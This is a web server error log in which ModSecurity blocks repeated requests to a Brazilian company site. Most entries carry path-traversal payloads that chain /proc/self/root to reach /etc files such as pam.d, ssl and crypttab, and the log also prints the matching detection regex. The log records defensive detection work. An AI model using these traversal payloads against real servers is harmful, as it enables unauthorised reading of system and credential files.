[Tue Mar 17 10:24:57.975701 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.243.203:33708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWKdCmCSWTlPouqorRbgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:00.403193 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:59684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWLJqmL8PQht4WJFlNUAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:01.913091 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:52482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWLe82sZHvlq4xgHrIeQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:03.927622 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:52496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWL-82sZHvlq4xgHrIegAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:15.470334 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.243.203:52502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWO5qmL8PQht4WJFlNaQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:47.199628 2026] [:error] [pid 18604:tid 140411548894976] [client 74.7.243.203:51544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWW0Bd0UqwxWindINtnQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:48.460499 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:48166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWXO82sZHvlq4xgHrIfwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:25:54.098120 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.243.203:48178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWYgb2qCuy5irgBMjOEQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:56.563096 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:50750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWZO82sZHvlq4xgHrIgQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:25:57.349910 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.241.46:56100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWZZqmL8PQht4WJFlNkAAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:26:44.235207 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:44190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWlKBJNF7axNlVR0UCkAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:28:22.502050 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:46402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablW9qBJNF7axNlVR0UC7QAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:28:26.234037 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:45918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablW-u82sZHvlq4xgHrIlQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:28:53.983084 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:45920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXFa4xEDsg_V3ESNY5EAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:29:00.631651 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.243.203:44026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXHNCmCSWTlPouqorRogAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:29:01.981634 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.243.203:60618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXHZqmL8PQht4WJFlNpgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:29:09.281477 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:60632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXJK4xEDsg_V3ESNY5GgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:29:16.423167 2026] [:error] [pid 18604:tid 140411641214720] [client 74.7.244.31:54618] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablXLEBd0UqwxWindINtygAAA0w"]
[Tue Mar 17 10:29:22.515762 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.243.203:55142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXMgb2qCuy5irgBMjOZwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:29:23.814725 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.203:54374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXM6t8Nd0UC_OcbVG0ugAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:29:24.965830 2026] [:error] [pid 18709:tid 140411574073088] [client 74.7.243.203:54378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXNDarLhPAjZGI1b2z1QAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:29:37.418154 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.243.203:54382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXQZqmL8PQht4WJFlNvQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
